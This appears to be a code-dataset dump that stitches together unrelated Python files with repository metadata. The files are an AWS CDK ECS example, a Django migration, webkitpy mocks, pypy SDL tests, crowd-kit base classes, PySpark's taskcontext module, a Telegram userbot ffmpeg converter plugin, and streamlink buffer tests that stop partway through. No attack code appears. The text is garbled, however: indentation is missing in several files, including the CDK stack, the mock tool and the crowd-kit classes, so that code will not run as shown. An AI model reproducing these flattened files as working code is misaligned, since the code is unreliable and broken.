marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 2,941
|
2019-02-08T15:29:36.000Z
|
2022-03-31T23:57:42.000Z
|
python/ecs/cluster/app.py
|
marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 558
|
2019-02-14T23:32:02.000Z
|
2022-03-30T00:35:11.000Z
|
python/ecs/cluster/app.py
|
marclyo/aws-cdk-examples
|
f041f07ebd4c94897e16d37ff813a38eb32645a1
|
[
"Apache-2.0"
] | 1,409
|
2019-02-12T19:13:04.000Z
|
2022-03-31T18:46:21.000Z
|
from aws_cdk import (
aws_autoscaling as autoscaling,
aws_ec2 as ec2,
aws_ecs as ecs,
core,
)
class ECSCluster(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
        super().__init__(scope, id, **kwargs)
vpc = ec2.Vpc(
self, "MyVpc",
max_azs=2
)
asg = autoscaling.AutoScalingGroup(
self, "MyFleet",
instance_type=ec2.InstanceType("t2.xlarge"),
machine_image=ecs.EcsOptimizedAmi(),
associate_public_ip_address=True,
update_type=autoscaling.UpdateType.REPLACING_UPDATE,
desired_capacity=3,
vpc=vpc,
vpc_subnets={ 'subnet_type': ec2.SubnetType.PUBLIC },
)
cluster = ecs.Cluster(
self, 'EcsCluster',
vpc=vpc
)
cluster.add_auto_scaling_group(asg)
cluster.add_capacity("DefaultAutoScalingGroup",
instance_type=ec2.InstanceType("t2.micro"))
app = core.App()
ECSCluster(app, "MyFirstEcsCluster")
app.synth()
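# Usage note (a sketch under assumed CDK v1 semantics, not from the original
# example): add_capacity both creates an AutoScalingGroup and registers it with
# the cluster, so the explicit "MyFleet" ASG plus add_auto_scaling_group above
# could be collapsed into a single call, e.g.:
#
# cluster.add_capacity(
#     "DefaultAutoScalingGroup",
#     instance_type=ec2.InstanceType("t2.xlarge"),
#     desired_capacity=3,
# )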
# ---- file: XD/mysite/polls/migrations/0001_initial.py | repo: ChyiLin/HAHA | license: MIT ----
# Generated by Django 2.1.4 on 2018-12-22 04:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
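# A reconstruction sketch (inferred from the operations above, not part of the
# original file) of the polls/models.py that would generate this migration:
#
# from django.db import models
#
# class Question(models.Model):
#     question_text = models.CharField(max_length=200)
#     pub_date = models.DateTimeField('date published')
#
# class Choice(models.Model):
#     question = models.ForeignKey(Question, on_delete=models.CASCADE)
#     choice_text = models.CharField(max_length=200)
#     votes = models.IntegerField(default=0)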
# ---- file: Tools/Scripts/webkitpy/tool/mocktool.py | repo: jacadcaps/webkitty | license: BSD-2-Clause ----
# Copyright (C) 2011 Google Inc. All rights reserved.
# Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
from webkitpy.common.host_mock import MockHost
from webkitpy.common.net.buildbot.buildbot_mock import MockBuildBot
from webkitpy.common.net.ewsserver_mock import MockEWSServer
from webkitpy.common.net.irc.irc_mock import MockIRC
# FIXME: Old-style "Ports" need to die and be replaced by modern layout_tests.port which needs to move to common.
from webkitpy.common.config.ports_mock import MockPort
# FIXME: We should just replace this with optparse.Values(default=kwargs)
class MockOptions(object):
"""Mock implementation of optparse.Values."""
def __init__(self, **kwargs):
# The caller can set option values using keyword arguments. We don't
# set any values by default because we don't know how this
# object will be used. Generally speaking unit tests should
# subclass this or provider wrapper functions that set a common
# set of options.
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(**kwargs)
return self
def ensure_value(self, key, value):
        if getattr(self, key, None) is None:
self.__dict__[key] = value
return self.__dict__[key]
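# A minimal usage sketch of MockOptions (hypothetical option names, in the
# style unit tests typically use; not part of the original file):
#
# options = MockOptions(confirm=True, git_commit="HEAD")
# options.ensure_value("verbose", False)   # sets and returns the default
# options.update(verbose=True)             # later overrides it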
# FIXME: This should be renamed MockWebKitPatch.
class MockTool(MockHost):
def __init__(self, *args, **kwargs):
MockHost.__init__(self, *args, **kwargs)
self._deprecated_port = MockPort()
self.ews_server = MockEWSServer()
self._irc = None
self.irc_password = "MOCK irc password"
self.wakeup_event = threading.Event()
def deprecated_port(self):
return self._deprecated_port
def path(self):
return "echo"
def ensure_irc_connected(self, delegate):
if not self._irc:
self._irc = MockIRC()
def irc(self):
return self._irc
# ---- file: pypy/rlib/rsdl/test/test_basic.py | repo: woodrow/pyoac | license: MIT ----
import py
from pypy.rlib.rsdl import RSDL
from pypy.rlib.rarithmetic import r_uint
from pypy.rpython.lltypesystem import rffi
def test_sdl_init():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Quit()
def test_surface_basic():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
surface = RSDL.CreateRGBSurface(0, 150, 50, 32,
r_uint(0x000000FF),
r_uint(0x0000FF00),
r_uint(0x00FF0000),
r_uint(0xFF000000))
assert surface
assert rffi.getintfield(surface, 'c_w') == 150
assert rffi.getintfield(surface, 'c_h') == 50
RSDL.FreeSurface(surface)
RSDL.Quit()
def test_get_keyname():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
assert RSDL.GetKeyName(RSDL.K_PLUS)[0] == '+'
assert RSDL.GetKeyName(RSDL.K_RIGHTPAREN)[0] == ')'
assert RSDL.GetKeyName(RSDL.K_z)[0] == 'z'
def test_delay_getticks():
assert RSDL.Init(RSDL.INIT_VIDEO) >= 0
RSDL.Delay(10)
i = RSDL.GetTicks()
assert i >= 10
RSDL.Quit()
# ---- file: build/lib/crowdkit/aggregation/base/__init__.py | repo: artinmajdi/crowd-kit | license: Apache-2.0 ----
__all__ = [
'BaseClassificationAggregator',
'BaseImageSegmentationAggregator',
'BaseEmbeddingsAggregator',
'BaseTextsAggregator',
'BasePairwiseAggregator',
]
import attr
from .. import annotations
@attr.s
@annotations.manage_docstring
class BaseClassificationAggregator:
""" This is a base class for all classification aggregators"""
labels_: annotations.OPTIONAL_LABELS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.LABELED_DATA) -> annotations.Annotation(type='BaseClassificationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.LABELED_DATA) -> annotations.TASKS_LABELS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseImageSegmentationAggregator:
"""This is a base class for all image segmentation aggregators"""
segmentations_: annotations.TASKS_SEGMENTATIONS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.SEGMENTATION_DATA) -> annotations.Annotation(type='BaseImageSegmentationAggregator',
title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.SEGMENTATION_DATA) -> annotations.TASKS_SEGMENTATIONS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseEmbeddingsAggregator:
"""This is a base class for all embeddings aggregators"""
embeddings_and_outputs_: annotations.TASKS_EMBEDDINGS_AND_OUTPUTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.EMBEDDED_DATA) -> annotations.Annotation(type='BaseEmbeddingsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.EMBEDDED_DATA) -> annotations.TASKS_EMBEDDINGS_AND_OUTPUTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BaseTextsAggregator:
""" This is a base class for all texts aggregators"""
texts_: annotations.TASKS_TEXTS = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.TEXT_DATA) -> annotations.Annotation(type='BaseTextsAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.TEXT_DATA) -> annotations.TASKS_TEXTS:
raise NotImplementedError()
@attr.s
@annotations.manage_docstring
class BasePairwiseAggregator:
""" This is a base class for all pairwise comparison aggregators"""
scores_: annotations.LABEL_SCORES = attr.ib(init=False)
@annotations.manage_docstring
def fit(self, data: annotations.PAIRWISE_DATA) -> annotations.Annotation(type='BasePairwiseAggregator', title='self'):
raise NotImplementedError()
@annotations.manage_docstring
def fit_predict(self, data: annotations.PAIRWISE_DATA) -> annotations.LABEL_SCORES:
raise NotImplementedError()
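# A minimal sketch of a concrete subclass (illustrative only -- the majority
# vote logic below is an assumption, not the real crowd-kit implementation;
# it assumes `data` is a pandas.DataFrame with 'task' and 'label' columns):
#
# import pandas as pd
#
# @attr.s
# class SimpleMajorityVote(BaseClassificationAggregator):
#     def fit(self, data: pd.DataFrame) -> 'SimpleMajorityVote':
#         self.labels_ = data.groupby('task')['label'].agg(
#             lambda labels: labels.value_counts().idxmax())
#         return self
#     def fit_predict(self, data: pd.DataFrame) -> pd.Series:
#         return self.fit(data).labels_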
# ---- file: python/pyspark/taskcontext.py | repo: zhouyuan/sparkV | license: Apache-2.0 ----
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import write_int, UTF8Deserializer
class TaskContext(object):
"""
.. note:: Experimental
Contextual information about a task which can be read or mutated during
execution. To access the TaskContext for a running task, use:
:meth:`TaskContext.get`.
"""
_taskContext = None
_attemptNumber = None
_partitionId = None
_stageId = None
_taskAttemptId = None
_localProperties = None
_resources = None
def __new__(cls):
"""Even if users construct TaskContext instead of using get, give them the singleton."""
taskContext = cls._taskContext
if taskContext is not None:
return taskContext
cls._taskContext = taskContext = object.__new__(cls)
return taskContext
@classmethod
def _getOrCreate(cls):
"""Internal function to get or create global TaskContext."""
if cls._taskContext is None:
cls._taskContext = TaskContext()
return cls._taskContext
@classmethod
def get(cls):
"""
Return the currently active TaskContext. This can be called inside of
user functions to access contextual information about running tasks.
.. note:: Must be called on the worker, not the driver. Returns None if not initialized.
"""
return cls._taskContext
def stageId(self):
"""The ID of the stage that this task belong to."""
return self._stageId
def partitionId(self):
"""
The ID of the RDD partition that is computed by this task.
"""
return self._partitionId
def attemptNumber(self):
""""
How many times this task has been attempted. The first task attempt will be assigned
attemptNumber = 0, and subsequent attempts will have increasing attempt numbers.
"""
return self._attemptNumber
def taskAttemptId(self):
"""
An ID that is unique to this task attempt (within the same SparkContext, no two task
attempts will share the same attempt ID). This is roughly equivalent to Hadoop's
TaskAttemptID.
"""
return self._taskAttemptId
def getLocalProperty(self, key):
"""
Get a local property set upstream in the driver, or None if it is missing.
"""
return self._localProperties.get(key, None)
def resources(self):
"""
Resources allocated to the task. The key is the resource name and the value is information
about the resource.
"""
return self._resources
BARRIER_FUNCTION = 1
def _load_from_socket(port, auth_secret):
"""
Load data from a given socket, this is a blocking method thus only return when the socket
connection has been closed.
"""
(sockfile, sock) = local_connect_and_auth(port, auth_secret)
# The barrier() call may block forever, so no timeout
sock.settimeout(None)
# Make a barrier() function call.
write_int(BARRIER_FUNCTION, sockfile)
sockfile.flush()
# Collect result.
res = UTF8Deserializer().loads(sockfile)
# Release resources.
sockfile.close()
sock.close()
return res
class BarrierTaskContext(TaskContext):
"""
.. note:: Experimental
A :class:`TaskContext` with extra contextual info and tooling for tasks in a barrier stage.
Use :func:`BarrierTaskContext.get` to obtain the barrier context for a running barrier task.
.. versionadded:: 2.4.0
"""
_port = None
_secret = None
@classmethod
def _getOrCreate(cls):
"""
Internal function to get or create global BarrierTaskContext. We need to make sure
BarrierTaskContext is returned from here because it is needed in python worker reuse
scenario, see SPARK-25921 for more details.
"""
if not isinstance(cls._taskContext, BarrierTaskContext):
cls._taskContext = object.__new__(cls)
return cls._taskContext
@classmethod
def get(cls):
"""
.. note:: Experimental
Return the currently active :class:`BarrierTaskContext`.
This can be called inside of user functions to access contextual information about
running tasks.
.. note:: Must be called on the worker, not the driver. Returns None if not initialized.
"""
return cls._taskContext
@classmethod
def _initialize(cls, port, secret):
"""
Initialize BarrierTaskContext, other methods within BarrierTaskContext can only be called
after BarrierTaskContext is initialized.
"""
cls._port = port
cls._secret = secret
def barrier(self):
"""
.. note:: Experimental
Sets a global barrier and waits until all tasks in this stage hit this barrier.
Similar to `MPI_Barrier` function in MPI, this function blocks until all tasks
in the same stage have reached this routine.
        .. warning:: In a barrier stage, each task must have the same number of `barrier()`
calls, in all possible code branches.
Otherwise, you may get the job hanging or a SparkException after timeout.
.. versionadded:: 2.4.0
"""
if self._port is None or self._secret is None:
raise Exception("Not supported to call barrier() before initialize " +
"BarrierTaskContext.")
else:
_load_from_socket(self._port, self._secret)
def getTaskInfos(self):
"""
.. note:: Experimental
Returns :class:`BarrierTaskInfo` for all tasks in this barrier stage,
ordered by partition ID.
.. versionadded:: 2.4.0
"""
if self._port is None or self._secret is None:
raise Exception("Not supported to call getTaskInfos() before initialize " +
"BarrierTaskContext.")
else:
addresses = self._localProperties.get("addresses", "")
return [BarrierTaskInfo(h.strip()) for h in addresses.split(",")]
class BarrierTaskInfo(object):
"""
.. note:: Experimental
Carries all task infos of a barrier task.
:var address: The IPv4 address (host:port) of the executor that the barrier task is running on
.. versionadded:: 2.4.0
"""
def __init__(self, address):
self.address = address
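# A minimal usage sketch of the barrier API above (assumes a running
# SparkContext `sc` and Spark >= 2.4; illustrative only, not part of the
# original file):
#
# def stage_fn(iterator):
#     context = BarrierTaskContext.get()
#     context.barrier()  # blocks until every task in the stage reaches here
#     addresses = [info.address for info in context.getTaskInfos()]
#     yield (context.partitionId(), addresses)
#
# result = sc.parallelize(range(4), 4).barrier().mapPartitions(stage_fn).collect()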
| 31.873362
| 98
| 0.65735
|
from __future__ import print_function
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import write_int, UTF8Deserializer
class TaskContext(object):
_taskContext = None
_attemptNumber = None
_partitionId = None
_stageId = None
_taskAttemptId = None
_localProperties = None
_resources = None
def __new__(cls):
taskContext = cls._taskContext
if taskContext is not None:
return taskContext
cls._taskContext = taskContext = object.__new__(cls)
return taskContext
@classmethod
def _getOrCreate(cls):
if cls._taskContext is None:
cls._taskContext = TaskContext()
return cls._taskContext
@classmethod
def get(cls):
return cls._taskContext
def stageId(self):
return self._stageId
def partitionId(self):
return self._partitionId
def attemptNumber(self):
return self._attemptNumber
def taskAttemptId(self):
return self._taskAttemptId
def getLocalProperty(self, key):
return self._localProperties.get(key, None)
def resources(self):
return self._resources
BARRIER_FUNCTION = 1
def _load_from_socket(port, auth_secret):
(sockfile, sock) = local_connect_and_auth(port, auth_secret)
sock.settimeout(None)
write_int(BARRIER_FUNCTION, sockfile)
sockfile.flush()
res = UTF8Deserializer().loads(sockfile)
sockfile.close()
sock.close()
return res
class BarrierTaskContext(TaskContext):
_port = None
_secret = None
@classmethod
def _getOrCreate(cls):
if not isinstance(cls._taskContext, BarrierTaskContext):
cls._taskContext = object.__new__(cls)
return cls._taskContext
@classmethod
def get(cls):
return cls._taskContext
@classmethod
def _initialize(cls, port, secret):
cls._port = port
cls._secret = secret
def barrier(self):
if self._port is None or self._secret is None:
raise Exception("Not supported to call barrier() before initialize " +
"BarrierTaskContext.")
else:
_load_from_socket(self._port, self._secret)
def getTaskInfos(self):
if self._port is None or self._secret is None:
raise Exception("Not supported to call getTaskInfos() before initialize " +
"BarrierTaskContext.")
else:
addresses = self._localProperties.get("addresses", "")
return [BarrierTaskInfo(h.strip()) for h in addresses.split(",")]
class BarrierTaskInfo(object):
def __init__(self, address):
self.address = address
| true
| true
|
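The taskcontext record above defines PySpark's barrier execution API. As a hedged illustration of how it is typically driven (this is not taken from the record itself), the sketch below assumes a local Spark 2.4+ installation; the app name, partition count, and the `sc` variable are illustrative:
from pyspark import SparkContext
from pyspark.taskcontext import BarrierTaskContext

sc = SparkContext(appName="barrier-demo")  # illustrative app name

def stage(iterator):
    ctx = BarrierTaskContext.get()
    ctx.barrier()  # every task in the barrier stage blocks here until all arrive
    # inside a barrier stage, getTaskInfos() lists all tasks, ordered by partition
    return [info.address for info in ctx.getTaskInfos()]

# RDD.barrier().mapPartitions() is what turns this into a barrier stage
addresses = sc.parallelize(range(4), 4).barrier().mapPartitions(stage).collect()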
790de0d7084706fafc0cf001bb4f424782073242
| 4,045
|
py
|
Python
|
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
userbot/plugins/fconvert.py
|
anandhu-dev/catuserbot
|
0ae10db978c1a9bf3f4f0da991a86d85fc29c0f1
|
[
"MIT"
] | null | null | null |
"""File Converter
.nfc """
import asyncio
import os
import time
from datetime import datetime
from userbot.utils import admin_cmd, progress
@borg.on(admin_cmd(pattern="nfc (.*)")) # pylint:disable=E0602
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
reply_message = await event.get_reply_message()
if reply_message is None:
await event.edit("reply to a media to use the `nfc` operation.\nInspired by @FileConverterBot")
return
await event.edit("trying to download media file, to my local")
try:
start = datetime.now()
c_time = time.time()
downloaded_file_name = await borg.download_media(
reply_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to download")
)
)
except Exception as e: # pylint:disable=C0103,W0703
await event.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.edit("Downloaded to `{}` in {} seconds.".format(downloaded_file_name, ms))
new_required_file_name = ""
new_required_file_caption = ""
command_to_run = []
force_document = False
voice_note = False
supports_streaming = False
if input_str == "voice":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".opus"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
new_required_file_name
]
voice_note = True
supports_streaming = True
elif input_str == "mp3":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".mp3"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-vn",
new_required_file_name
]
voice_note = False
supports_streaming = True
else:
await event.edit("not supported")
os.remove(downloaded_file_name)
return
logger.info(command_to_run)
# TODO: re-write create_subprocess_exec 😉
process = await asyncio.create_subprocess_exec(
*command_to_run,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if os.path.exists(new_required_file_name):
end_two = datetime.now()
await borg.send_file(
entity=event.chat_id,
file=new_required_file_name,
caption="`File Successfully converted by` @kannappan04",
allow_cache=False,
silent=True,
force_document=force_document,
voice_note=voice_note,
supports_streaming=supports_streaming,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to upload")
)
)
ms_two = (end_two - end).seconds
os.remove(new_required_file_name)
await event.edit(f"converted in {ms_two} seconds")
| 37.110092
| 103
| 0.5644
|
import asyncio
import os
import time
from datetime import datetime
from userbot.utils import admin_cmd, progress
@borg.on(admin_cmd(pattern="nfc (.*)"))
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
reply_message = await event.get_reply_message()
if reply_message is None:
await event.edit("reply to a media to use the `nfc` operation.\nInspired by @FileConverterBot")
return
await event.edit("trying to download media file, to my local")
try:
start = datetime.now()
c_time = time.time()
downloaded_file_name = await borg.download_media(
reply_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to download")
)
)
except Exception as e:
await event.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.edit("Downloaded to `{}` in {} seconds.".format(downloaded_file_name, ms))
new_required_file_name = ""
new_required_file_caption = ""
command_to_run = []
force_document = False
voice_note = False
supports_streaming = False
if input_str == "voice":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".opus"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
new_required_file_name
]
voice_note = True
supports_streaming = True
elif input_str == "mp3":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".mp3"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-vn",
new_required_file_name
]
voice_note = False
supports_streaming = True
else:
await event.edit("not supported")
os.remove(downloaded_file_name)
return
logger.info(command_to_run)
process = await asyncio.create_subprocess_exec(
*command_to_run,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if os.path.exists(new_required_file_name):
end_two = datetime.now()
await borg.send_file(
entity=event.chat_id,
file=new_required_file_name,
caption="`File Successfully converted by` @kannappan04",
allow_cache=False,
silent=True,
force_document=force_document,
voice_note=voice_note,
supports_streaming=supports_streaming,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to upload")
)
)
ms_two = (end_two - end).seconds
os.remove(new_required_file_name)
await event.edit(f"converted in {ms_two} seconds")
| true
| true
|
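The fconvert.py record above wraps ffmpeg in an asyncio subprocess. Below is a minimal, standalone sketch of that pattern, assuming ffmpeg is on PATH; the file names are placeholders, and the codec arguments merely mirror the plugin's "voice" branch rather than coming from its framework globals (borg, Config, logger):
import asyncio

async def run_ffmpeg(*args):
    # spawn ffmpeg with piped stdout/stderr so its output can be inspected
    process = await asyncio.create_subprocess_exec(
        "ffmpeg", *args,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    stdout, stderr = await process.communicate()  # wait for ffmpeg to exit
    return process.returncode, stderr.decode().strip()

# placeholder paths; arguments mirror the libopus "voice" branch above
rc, log = asyncio.run(run_ffmpeg(
    "-i", "input.mp4", "-map", "0:a", "-codec:a", "libopus",
    "-b:a", "100k", "-vbr", "on", "output.opus"))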
790de0eafb238d094bd686b29f075e37c87c9f95
| 3,638
|
py
|
Python
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 10
|
2017-04-10T18:25:41.000Z
|
2021-09-15T20:14:58.000Z
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 9
|
2020-04-04T09:49:52.000Z
|
2020-04-21T01:52:02.000Z
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 12
|
2022-01-30T23:34:18.000Z
|
2022-03-26T17:09:43.000Z
|
import unittest
from streamlink.buffers import Buffer, RingBuffer
class TestBuffer(unittest.TestCase):
def setUp(self):
self.buffer = Buffer()
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.read(4096), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_readwrite(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.length, 4096)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(1), b"1")
self.assertEqual(self.buffer.read(4095), b"1" * 4095)
self.assertEqual(self.buffer.read(8192), b"2" * 4096)
self.assertEqual(self.buffer.read(8192), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_close(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.buffer.close()
self.buffer.write(b"2" * 8192)
self.assertEqual(self.buffer.length, 8192)
def test_reuse_input(self):
"""Objects should be reusable after write()"""
original = b"original"
tests = [bytearray(original), memoryview(bytearray(original))]
for data in tests:
self.buffer.write(data)
data[:] = b"reused!!"
self.assertEqual(self.buffer.read(), original)
def test_read_empty(self):
self.assertRaises(
StopIteration,
lambda: next(self.buffer._iterate_chunks(10)))
class TestRingBuffer(unittest.TestCase):
BUFFER_SIZE = 8192 * 4
def setUp(self):
self.buffer = RingBuffer(size=self.BUFFER_SIZE)
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.length, 0)
def test_read_timeout(self):
self.assertRaises(
IOError,
self.buffer.read, timeout=0.1)
def test_write_after_close(self):
self.buffer.close()
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 0)
self.assertTrue(self.buffer.closed)
def test_resize(self):
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE)
self.buffer.resize(self.BUFFER_SIZE * 2)
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE * 2)
def test_free(self):
self.assertEqual(self.buffer.free, self.BUFFER_SIZE)
self.buffer.write(b'1' * 100)
self.assertEqual(self.buffer.free, self.BUFFER_SIZE - 100)
| 33.072727
| 71
| 0.628642
|
import unittest
from streamlink.buffers import Buffer, RingBuffer
class TestBuffer(unittest.TestCase):
def setUp(self):
self.buffer = Buffer()
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.read(4096), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_readwrite(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.length, 4096)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(1), b"1")
